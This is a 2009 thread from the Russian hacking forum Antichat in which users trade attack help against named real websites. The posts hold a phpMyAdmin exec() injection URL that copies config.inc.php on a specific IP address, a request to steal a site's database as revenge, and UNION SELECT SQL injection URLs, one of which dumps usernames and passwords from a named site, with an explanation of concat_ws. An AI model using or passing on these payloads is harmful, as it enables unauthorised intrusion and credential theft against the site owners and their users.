ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

20.05.2009, 22:10
|
|
Участник форума
Регистрация: 07.01.2008
Сообщений: 152
Провел на форуме: 315077
Репутация:
24
|
|
понятно, тоесть дохлый номер.
а вот этот вариант
Стоит на сервере Vertrigo
http://83.167.125.144/cp/?module=character&action=online'
Стоит phpMyAdmin 2.11.7
http://83.167.125.144/phpmyadmin
Вроде можно сделать так и жизнь станет легче
/server_databases.php?pos=0&dbstats=0&sort_ by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]
но я не пойму как она работает, и все равно выводит только запрос на Логин и Пасс.
Подскажите как правильно.
Последний раз редактировалось xJeWeL; 20.05.2009 в 22:13..
|
|
|

29.05.2009, 15:21
|
|
Новичок
Регистрация: 14.05.2009
Сообщений: 13
Провел на форуме: 107398
Репутация:
-12
|
|
ОФФТОП ПРОСТИТЕ! помогите стырить бд http://www.syone.ru/ Причина: админ невыплатил все что выйграл! даже подовал в арбиртраж ,а они послали!
|
|
|

30.05.2009, 22:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
1 www.syone.ru
2 clavesin.ru
от него clavesin.ru
могу тока пассивную ксс'ку дать на сайте с одного ИП +)
|
|
|

05.06.2009, 23:24
|
|
Новичок
Регистрация: 01.06.2009
Сообщений: 24
Провел на форуме: 194387
Репутация:
6
|
|
http://w1.dwar.ru/user_info.php?nick=%CB%E8%F1%EE%F2%E0#[injection] огромная просьба помочь, если вообще это реально
|
|
|

08.06.2009, 15:26
|
|
Новичок
Регистрация: 02.08.2008
Сообщений: 8
Провел на форуме: 208141
Репутация:
0
|
|
Подскажите чего дальше делать?
подобрал число полей
h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22
нашёл таблицу Users
h__p://sait.ru/index.php?page_id=1+un ion+s elect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22+from+user s
пробую использовать INFORMATION_SCHEMA ни чего не получается отображается страница
h__p://sait.ru/index.php?page_id=-1+u nion+s elect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+information schema.tables+limit+1,1
Последний раз редактировалось uniis; 14.07.2009 в 23:51..
|
|
|

08.06.2009, 15:32
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме: 1168802
Репутация:
298
|
|
http://gpsautospb.ru/index.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,concat_ws(0x3a,username,password),19,20,21, 22+from+users
вывод в заголовке (title)
|
|
|

08.06.2009, 15:35
|
|
Новичок
Регистрация: 02.08.2008
Сообщений: 8
Провел на форуме: 208141
Репутация:
0
|
|
спасибо! тока объясни я просто ещё до этого оператора не дошёл concat_ws что он делает?
Последний раз редактировалось uniis; 14.07.2009 в 23:39..
|
|
|

08.06.2009, 15:41
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме: 1168802
Репутация:
298
|
|
uniis, concat_ws(0x3a,username,password)
оператор позволяет в одной переменной выводить несколько полей.
0x3a - это шестандцатиричное двоеточие (для удобства разделения переменных), две последующие.. это переменные, которые нужно конкатинировать (объеденить), через 0x3a
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat-ws
|
|
|

28.06.2009, 17:11
|
|
Участник форума
Регистрация: 02.12.2006
Сообщений: 126
Провел на форуме: 611883
Репутация:
70
|
|
Попробуйте раскрутить
http://www.may-hosting.com/index.php?L=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30--
|
|
|

27.07.2009, 23:12
|
|
Новичок
Регистрация: 14.07.2009
Сообщений: 4
Провел на форуме: 11163
Репутация:
0
|
|
кто может помочь с инъекцией там сложновато все кто хорошо разбирается напишите в личку разговор долгий достаточно
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|